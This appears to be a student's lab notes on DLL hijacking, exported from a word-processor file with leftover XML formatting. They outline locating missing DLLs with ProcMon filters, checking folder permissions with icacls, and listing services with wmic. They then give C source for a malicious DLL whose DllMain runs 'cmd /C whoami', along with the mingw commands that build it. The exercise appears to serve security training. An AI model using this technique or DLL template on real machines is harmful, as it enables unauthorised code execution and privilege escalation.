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DLL hijacking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-identify vulnerability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-take advantage of the default search order for DLLS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-NAME_NOT_FOUND present in executable’s system calls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-validate permissions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-create and transfer Malicious DLL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C:\windows\system32&gt; icacls c:\users\student\exercise_2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putty.exe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only add =&gt; DLL hijack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run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wmic service list full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 query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Filters for ProcMon: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-process name contains putty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-result contains NAME NOT FOUND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-path contains .dll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nano bad.c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99999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include 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Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="990000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">execCommand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WinExec(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="dd1144"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"cmd /C whoami &gt; FINDME_1.txt"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return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BOOL WINAPI </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="990000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DllMain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(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)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execCommand();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33333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 return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i686-w64-mingw32-g++ -c bad.c -o bad.o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#4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0"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">i686-w64-mingw32-g++ -shared -o bad.dll bad.o -Wl,--out-implib,bad.a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